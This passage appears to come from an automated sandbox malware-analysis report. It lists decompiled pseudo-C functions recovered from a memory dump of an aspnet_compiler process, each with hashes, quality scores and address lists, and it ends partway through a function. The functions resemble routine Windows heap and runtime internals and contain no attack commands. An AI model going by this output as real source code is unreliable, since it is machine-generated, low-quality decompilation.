                          0x014c8fbb
                          0x014c8fbc
                          0x014c8fbe
                          0x014c8fc3
                          0x014c8fd6

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e845c89f9b35d2f68ea66a50fbd51de8fdad795e6f1a9ac61abf409c73580bff
                          • Instruction ID: 4411214bf39f45c7d61f87fe22abb892b84b620e55e6799f037895e1f6e68cc7
                          • Opcode Fuzzy Hash: e845c89f9b35d2f68ea66a50fbd51de8fdad795e6f1a9ac61abf409c73580bff
                          • Instruction Fuzzy Hash: 61014F74E0020EAFDB00EFA9D545AAEB7F4EF58700F50445AB905EB391EA74DA00DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E014B1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				short _v46;
                          				char _v52;
                          				signed char* _t15;
                          				intOrPtr _t21;
                          				intOrPtr _t27;
                          				intOrPtr _t28;
                          				signed int _t29;
                          
                          				_t26 = __edx;
                          				_v8 =  *0x14ed360 ^ _t29;
                          				_v12 = _a4;
                          				_v20 = __ecx;
                          				_v16 = __edx;
                          				_v46 = 0x1024;
                          				if(E01417D50() == 0) {
                          					_t15 = 0x7ffe0380;
                          				} else {
                          					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          				}
                          				_push( &_v52);
                          				_push(0xc);
                          				_push(0x20402);
                          				_push( *_t15 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                          			}














                          0x014b1608
                          0x014b1617
                          0x014b161d
                          0x014b1625
                          0x014b1628
                          0x014b162b
                          0x014b1636
                          0x014b1648
                          0x014b1638
                          0x014b1641
                          0x014b1641
                          0x014b1653
                          0x014b1654
                          0x014b1656
                          0x014b165b
                          0x014b166e

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d1db5d9ce277271b268c35ac4c6a511bd42d32d4462574ca3e73ccf736d420ed
                          • Instruction ID: 94e788a4d5b4571db8dfa296c1b90e95b6b6863163fd4e081c79507f6972e0ee
                          • Opcode Fuzzy Hash: d1db5d9ce277271b268c35ac4c6a511bd42d32d4462574ca3e73ccf736d420ed
                          • Instruction Fuzzy Hash: 8DF06271E00249EFDB14EFA9D445AAEB7F4EF68700F44405AA915EB3A1E6349900CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0141C577(void* __ecx, char _a4) {
                          				void* __esi;
                          				void* __ebp;
                          				void* _t17;
                          				void* _t19;
                          				void* _t20;
                          				void* _t21;
                          
                          				_t18 = __ecx;
                          				_t21 = __ecx;
                          				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0141C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x13d11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                          					__eflags = _a4;
                          					if(__eflags != 0) {
                          						L10:
                          						E014C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                          						L9:
                          						return 0;
                          					}
                          					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                          					if(__eflags == 0) {
                          						goto L10;
                          					}
                          					goto L9;
                          				} else {
                          					return 1;
                          				}
                          			}









                          0x0141c577
                          0x0141c57d
                          0x0141c581
                          0x0141c5b5
                          0x0141c5b9
                          0x0141c5ce
                          0x0141c5ce
                          0x0141c5ca
                          0x00000000
                          0x0141c5ca
                          0x0141c5c4
                          0x0141c5c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141c5ad
                          0x00000000
                          0x0141c5af

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc43181b8f5214eeea3db896b6cd8d3becbded7d59b6043c112d508267e5cc59
                          • Instruction ID: 0aa4eb848d9e9f8bebb82a8e7371ca78d66874816ac5a352bcdf6d8d2815a5f2
                          • Opcode Fuzzy Hash: cc43181b8f5214eeea3db896b6cd8d3becbded7d59b6043c112d508267e5cc59
                          • Instruction Fuzzy Hash: F0F024B28912B0CFE732C32CC8C4B237FDA9B04638F44446BD4058333AC2B0C880C258
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E014B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                          				void* __esi;
                          				signed char _t3;
                          				signed char _t7;
                          				void* _t19;
                          
                          				_t17 = __ecx;
                          				_t3 = E014AFD22(__ecx);
                          				_t19 =  *0x14e849c - _t3; // 0x3a39b862
                          				if(_t19 == 0) {
                          					__eflags = _t17 -  *0x14e8748; // 0x0
                          					if(__eflags <= 0) {
                          						E014B1C06();
                          						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                          						__eflags = _t3;
                          						if(_t3 != 0) {
                          							L5:
                          							__eflags =  *0x14e8724 & 0x00000004;
                          							if(( *0x14e8724 & 0x00000004) == 0) {
                          								asm("int3");
                          								return _t3;
                          							}
                          						} else {
                          							_t3 =  *0x7ffe02d4 & 0x00000003;
                          							__eflags = _t3 - 3;
                          							if(_t3 == 3) {
                          								goto L5;
                          							}
                          						}
                          					}
                          					return _t3;
                          				} else {
                          					_t7 =  *0x14e8724; // 0x0
                          					return E014A8DF1(__ebx, 0xc0000374, 0x14e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                          				}
                          			}







                          0x014b2076
                          0x014b2078
                          0x014b207d
                          0x014b2083
                          0x014b20a4
                          0x014b20aa
                          0x014b20ac
                          0x014b20b7
                          0x014b20ba
                          0x014b20bc
                          0x014b20c9
                          0x014b20c9
                          0x014b20d0
                          0x014b20d2
                          0x00000000
                          0x014b20d2
                          0x014b20be
                          0x014b20c3
                          0x014b20c5
                          0x014b20c7
                          0x00000000
                          0x00000000
                          0x014b20c7
                          0x014b20bc
                          0x014b20d4
                          0x014b2085
                          0x014b2085
                          0x014b20a3
                          0x014b20a3

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c34adddbc163147a2e215a440e6e3e44a25f30ca1f9a128e7838b9f38fc27646
                          • Instruction ID: 5508c68a43471035a2624e2b3f29a72e6e3cf4b350aa2f06a9657fbff9672754
                          • Opcode Fuzzy Hash: c34adddbc163147a2e215a440e6e3e44a25f30ca1f9a128e7838b9f38fc27646
                          • Instruction Fuzzy Hash: 10F020AA4121878ADF33AB293580AE23BD2D765150F0A008BDA901B33AC5B49893DB71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 54%
                          			E0143927A(void* __ecx) {
                          				signed int _t11;
                          				void* _t14;
                          
                          				_t11 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                          				if(_t11 != 0) {
                          					E0143FA60(_t11, 0, 0x98);
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                          					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                          					E014392C6(_t11, _t14);
                          				}
                          				return _t11;
                          			}





                          0x01439295
                          0x01439299
                          0x0143929f
                          0x014392aa
                          0x014392ad
                          0x014392ae
                          0x014392af
                          0x014392b0
                          0x014392b4
                          0x014392bb
                          0x014392bb
                          0x014392c5

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                          • Instruction ID: b2c7c1c99759b8347733137664c2b5487a4d048f59579f67cf0cbdafbc32cc18
                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                          • Instruction Fuzzy Hash: B1E02B323409016BE711AF0ACC80F03375DDFE6724F04447EB5041E262C6F5DC0987A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 43%
                          			E014C8D34(intOrPtr __ecx, intOrPtr __edx) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				short _v42;
                          				char _v48;
                          				signed char* _t12;
                          				intOrPtr _t18;
                          				intOrPtr _t24;
                          				intOrPtr _t25;
                          				signed int _t26;
                          
                          				_t23 = __edx;
                          				_v8 =  *0x14ed360 ^ _t26;
                          				_v16 = __ecx;
                          				_v42 = 0x1c2b;
                          				_v12 = __edx;
                          				if(E01417D50() == 0) {
                          					_t12 = 0x7ffe0386;
                          				} else {
                          					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          				}
                          				_push( &_v48);
                          				_push(8);
                          				_push(0x20402);
                          				_push( *_t12 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                          			}













                          0x014c8d34
                          0x014c8d43
                          0x014c8d4b
                          0x014c8d4e
                          0x014c8d52
                          0x014c8d5c
                          0x014c8d6e
                          0x014c8d5e
                          0x014c8d67
                          0x014c8d67
                          0x014c8d79
                          0x014c8d7a
                          0x014c8d7c
                          0x014c8d81
                          0x014c8d94

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aead940d121c7a645dc9afee80883a0c9bcc2f80e255f4d039c41eb27eb461f3
                          • Instruction ID: c954aa4af22853539eb2813fe9e1b7d308108842213a0607f11ac667229d8a8f
                          • Opcode Fuzzy Hash: aead940d121c7a645dc9afee80883a0c9bcc2f80e255f4d039c41eb27eb461f3
                          • Instruction Fuzzy Hash: D8F09A70E0460AAFDB14EBA9D441A6EB7B4EB68700F50849AE905AB2A1EA34D9018B54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E014C8B58(intOrPtr __ecx) {
                          				signed int _v8;
                          				intOrPtr _v20;
                          				short _v46;
                          				char _v52;
                          				signed char* _t11;
                          				intOrPtr _t17;
                          				intOrPtr _t22;
                          				intOrPtr _t23;
                          				intOrPtr _t24;
                          				signed int _t25;
                          
                          				_v8 =  *0x14ed360 ^ _t25;
                          				_v20 = __ecx;
                          				_v46 = 0x1c26;
                          				if(E01417D50() == 0) {
                          					_t11 = 0x7ffe0386;
                          				} else {
                          					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          				}
                          				_push( &_v52);
                          				_push(4);
                          				_push(0x402);
                          				_push( *_t11 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                          			}













                          0x014c8b67
                          0x014c8b6f
                          0x014c8b72
                          0x014c8b7d
                          0x014c8b8f
                          0x014c8b7f
                          0x014c8b88
                          0x014c8b88
                          0x014c8b9a
                          0x014c8b9b
                          0x014c8b9d
                          0x014c8ba2
                          0x014c8bb5

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7a10fe9672f6ceb0b45bd08b7d9e5a389112b2ea28fd76b3492c7db6846c3e4
                          • Instruction ID: fe018b2d3fbe537b67d50580a184b6e6f221ac934e5517d83e06ffa414722a74
                          • Opcode Fuzzy Hash: e7a10fe9672f6ceb0b45bd08b7d9e5a389112b2ea28fd76b3492c7db6846c3e4
                          • Instruction Fuzzy Hash: 5DF0E2B0A0024EABDB00EBA9D906E6FB3B4EF18700F00045EBA05DB3A1FA30D900C794
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0141746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                          				signed int _t8;
                          				void* _t10;
                          				short* _t17;
                          				void* _t19;
                          				intOrPtr _t20;
                          				void* _t21;
                          
                          				_t20 = __esi;
                          				_t19 = __edi;
                          				_t17 = __ebx;
                          				if( *((char*)(_t21 - 0x25)) != 0) {
                          					if(__ecx == 0) {
                          						E0140EB70(__ecx, 0x14e79a0);
                          					} else {
                          						asm("lock xadd [ecx], eax");
                          						if((_t8 | 0xffffffff) == 0) {
                          							_push( *((intOrPtr*)(__ecx + 4)));
                          							E014395D0();
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                          							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                          							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                          						}
                          					}
                          					L10:
                          				}
                          				_t10 = _t19 + _t19;
                          				if(_t20 >= _t10) {
                          					if(_t19 != 0) {
                          						 *_t17 = 0;
                          						return 0;
                          					}
                          				}
                          				return _t10;
                          				goto L10;
                          			}









                          0x0141746d
                          0x0141746d
                          0x0141746d
                          0x01417471
                          0x01417488
                          0x0145f92d
                          0x0141748e
                          0x01417491
                          0x01417495
                          0x0145f937
                          0x0145f93a
                          0x0145f94e
                          0x0145f953
                          0x0145f956
                          0x0145f956
                          0x01417495
                          0x00000000
                          0x01417488
                          0x01417473
                          0x01417478
                          0x0141747d
                          0x01417481
                          0x00000000
                          0x01417481
                          0x0141747d
                          0x0141747a
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29e0a23e75e25e5472d5e868e685ef8da0c3feb4562c71dd5f8c4596a1e2ef30
                          • Instruction ID: b26b8933941a1afdf1836ed159fe3b48593d68068e6301eb6cc51358d40b11b0
                          • Opcode Fuzzy Hash: 29e0a23e75e25e5472d5e868e685ef8da0c3feb4562c71dd5f8c4596a1e2ef30
                          • Instruction Fuzzy Hash: 81F0E935580545AADF0297ACC440F7A7FB1AF14312F04053BD991A72B9E7749801C785
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E014C8CD6(intOrPtr __ecx) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				short _v38;
                          				char _v44;
                          				signed char* _t11;
                          				intOrPtr _t17;
                          				intOrPtr _t22;
                          				intOrPtr _t23;
                          				intOrPtr _t24;
                          				signed int _t25;
                          
                          				_v8 =  *0x14ed360 ^ _t25;
                          				_v12 = __ecx;
                          				_v38 = 0x1c2d;
                          				if(E01417D50() == 0) {
                          					_t11 = 0x7ffe0386;
                          				} else {
                          					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          				}
                          				_push( &_v44);
                          				_push(0xffffffe4);
                          				_push(0x402);
                          				_push( *_t11 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                          			}













                          0x014c8ce5
                          0x014c8ced
                          0x014c8cf0
                          0x014c8cfb
                          0x014c8d0d
                          0x014c8cfd
                          0x014c8d06
                          0x014c8d06
                          0x014c8d18
                          0x014c8d19
                          0x014c8d1b
                          0x014c8d20
                          0x014c8d33

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cad8a0c592c298f5c62e05876f00a0291b6109f08749c085214f23ad92da5e5
                          • Instruction ID: 1dcc04b5a287ced63913e2307b4e678e07995cff0c038186287e2d20fa8a2dc1
                          • Opcode Fuzzy Hash: 9cad8a0c592c298f5c62e05876f00a0291b6109f08749c085214f23ad92da5e5
                          • Instruction Fuzzy Hash: E0F0E270A0420AABCB00EBA9E845E6E77B4EF68300F10019EE916EB3A1EA34D901C754
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E013F4F2E(void* __ecx, char _a4) {
                          				void* __esi;
                          				void* __ebp;
                          				void* _t17;
                          				void* _t19;
                          				void* _t20;
                          				void* _t21;
                          
                          				_t18 = __ecx;
                          				_t21 = __ecx;
                          				if(__ecx == 0) {
                          					L6:
                          					__eflags = _a4;
                          					if(__eflags != 0) {
                          						L8:
                          						E014C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                          						L9:
                          						return 0;
                          					}
                          					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                          					if(__eflags != 0) {
                          						goto L9;
                          					}
                          					goto L8;
                          				}
                          				_t18 = __ecx + 0x30;
                          				if(E0141C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x13d1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                          					goto L6;
                          				} else {
                          					return 1;
                          				}
                          			}









                          0x013f4f2e
                          0x013f4f34
                          0x013f4f38
                          0x01450b85
                          0x01450b85
                          0x01450b89
                          0x01450b9a
                          0x01450b9a
                          0x01450b9f
                          0x00000000
                          0x01450b9f
                          0x01450b94
                          0x01450b98
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01450b98
                          0x013f4f3e
                          0x013f4f48
                          0x00000000
                          0x013f4f6e
                          0x00000000
                          0x013f4f70

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cea6cd03006aaeca42beb164618937537671c61e723684766d970bbbcbe4ecda
                          • Instruction ID: c707e7adba3e2458d05f76c8f9a4043bd6d1b2c4da25f52f5ce320e970a785df
                          • Opcode Fuzzy Hash: cea6cd03006aaeca42beb164618937537671c61e723684766d970bbbcbe4ecda
                          • Instruction Fuzzy Hash: A2F0BE3A9216958FD7B2DB9CC1D4B23B7D8AF00778F04446AE80587A33C734E944C640
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0142A44B(signed int __ecx) {
                          				intOrPtr _t13;
                          				signed int _t15;
                          				signed int* _t16;
                          				signed int* _t17;
                          
                          				_t13 =  *0x14e7b9c; // 0x0
                          				_t15 = __ecx;
                          				_t16 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                          				if(_t16 == 0) {
                          					return 0;
                          				}
                          				 *_t16 = _t15;
                          				_t17 =  &(_t16[2]);
                          				E0143FA60(_t17, 0, _t15 << 2);
                          				return _t17;
                          			}







                          0x0142a44b
                          0x0142a453
                          0x0142a472
                          0x0142a476
                          0x00000000
                          0x0142a493
                          0x0142a47a
                          0x0142a47f
                          0x0142a486
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d13a1873c345cf6ed03c315570e57d676687dec3a4b1b2411516d1e9134b4189
                          • Instruction ID: a4995d6f1c0ceed5774a3a9857b994e89e538af3d8a877e81e6142a578217236
                          • Opcode Fuzzy Hash: d13a1873c345cf6ed03c315570e57d676687dec3a4b1b2411516d1e9134b4189
                          • Instruction Fuzzy Hash: 37E09272A01422ABD2219A19AC00F67739DDBE4655F19443AEA04C7634D638DD42C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E013FF358(void* __ecx, signed int __edx) {
                          				char _v8;
                          				signed int _t9;
                          				void* _t20;
                          
                          				_push(__ecx);
                          				_t9 = 2;
                          				_t20 = 0;
                          				if(E0142F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                          					_t20 = L01414620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                          				}
                          				return _t20;
                          			}






                          0x013ff35d
                          0x013ff361
                          0x013ff367
                          0x013ff372
                          0x013ff38c
                          0x013ff38c
                          0x013ff394

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                          • Instruction ID: 093272563e4e1453723bf2255dd439cc3e86ad68755dfb8dc51526446c70fc04
                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                          • Instruction Fuzzy Hash: 61E0D833A40118FBDB2196D99E05F5ABFBDDB54A60F04015AFE04D7160D5749D40C2D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0140FF60(intOrPtr _a4) {
                          				void* __ecx;
                          				void* __ebp;
                          				void* _t13;
                          				intOrPtr _t14;
                          				void* _t15;
                          				void* _t16;
                          				void* _t17;
                          
                          				_t14 = _a4;
                          				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x13d11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                          					return E014C88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                          				} else {
                          					return E01410050(_t14);
                          				}
                          			}










                          0x0140ff66
                          0x0140ff6b
                          0x00000000
                          0x0140ff8f
                          0x00000000
                          0x0140ff8f

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7e21de7e1e1d3488412cc2f000492246891558fb53d1feed5187dc4a2f92e23
                          • Instruction ID: 46154b3e3448aed5020a03302c5d7dca3cb56c0ed76a70f0348658e87f0ec4a0
                          • Opcode Fuzzy Hash: e7e21de7e1e1d3488412cc2f000492246891558fb53d1feed5187dc4a2f92e23
                          • Instruction Fuzzy Hash: 6DE0D8B110D2049FD737D75BE060F163B989B52629F19403FF00847AA2C671D885C295
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E014841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                          				void* _t5;
                          				void* _t14;
                          
                          				_push(8);
                          				_push(0x14d08f0);
                          				_t5 = E0144D08C(__ebx, __edi, __esi);
                          				if( *0x14e87ec == 0) {
                          					E0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                          					if( *0x14e87ec == 0) {
                          						 *0x14e87f0 = 0x14e87ec;
                          						 *0x14e87ec = 0x14e87ec;
                          						 *0x14e87e8 = 0x14e87e4;
                          						 *0x14e87e4 = 0x14e87e4;
                          					}
                          					 *(_t14 - 4) = 0xfffffffe;
                          					_t5 = L01484248();
                          				}
                          				return E0144D0D1(_t5);
                          			}





                          0x014841e8
                          0x014841ea
                          0x014841ef
                          0x014841fb
                          0x01484206
                          0x0148420b
                          0x01484216
                          0x0148421d
                          0x01484222
                          0x0148422c
                          0x01484231
                          0x01484231
                          0x01484236
                          0x0148423d
                          0x0148423d
                          0x01484247

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62516d0300ae7e8a9cac9db05ed3e147c549c9c20c0e21c0a5a280435d719578
                          • Instruction ID: 0f87cb4fbb69ab9287e83e80bc15d7fd3f49690604ab60b446996356e9596b01
                          • Opcode Fuzzy Hash: 62516d0300ae7e8a9cac9db05ed3e147c549c9c20c0e21c0a5a280435d719578
                          • Instruction Fuzzy Hash: 5EF01EB88A0703CFDFB1EFAA9A04708B6E4F764361F10412FA0008B2BAC73454A4CF01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014AD380(void* __ecx, void* __edx, intOrPtr _a4) {
                          				void* _t5;
                          
                          				if(_a4 != 0) {
                          					_t5 = L013FE8B0(__ecx, _a4, 0xfff);
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                          					return _t5;
                          				}
                          				return 0xc000000d;
                          			}




                          0x014ad38a
                          0x014ad39b
                          0x014ad3b1
                          0x00000000
                          0x014ad3b6
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                          • Instruction ID: 3085ef76796158bdf95f79f6fe60de39b1b9325c0aff11d1ab3c66dbb74bf4f1
                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                          • Instruction Fuzzy Hash: DBE0C231280205BBDB226E88CC00FA97B16DF70BA1F114036FE085ABB0C671AC91D7C4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0142A185() {
                          				void* __ecx;
                          				intOrPtr* _t5;
                          
                          				if( *0x14e67e4 >= 0xa) {
                          					if(_t5 < 0x14e6800 || _t5 >= 0x14e6900) {
                          						return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                          					} else {
                          						goto L1;
                          					}
                          				} else {
                          					L1:
                          					return E01410010(0x14e67e0, _t5);
                          				}
                          			}





                          0x0142a190
                          0x0142a1a6
                          0x0142a1c2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0142a192
                          0x0142a192
                          0x0142a19f
                          0x0142a19f

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c22ec41e066a74c6a6ce715775dcca35d1d218bc10a072054a2b8babbfac8a44
                          • Instruction ID: aa98885f5bf435cc20dd7509ba8c9357de9b994b680719216d7a52827afc1947
                          • Opcode Fuzzy Hash: c22ec41e066a74c6a6ce715775dcca35d1d218bc10a072054a2b8babbfac8a44
                          • Instruction Fuzzy Hash: D8D02EB12A10001AC72EA7009A18B313693F7B4772F3A080FF2030BDB9EB70C8D4C208
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014216E0(void* __edx, void* __eflags) {
                          				void* __ecx;
                          				void* _t3;
                          
                          				_t3 = E01421710(0x14e67e0);
                          				if(_t3 == 0) {
                          					_t6 =  *[fs:0x30];
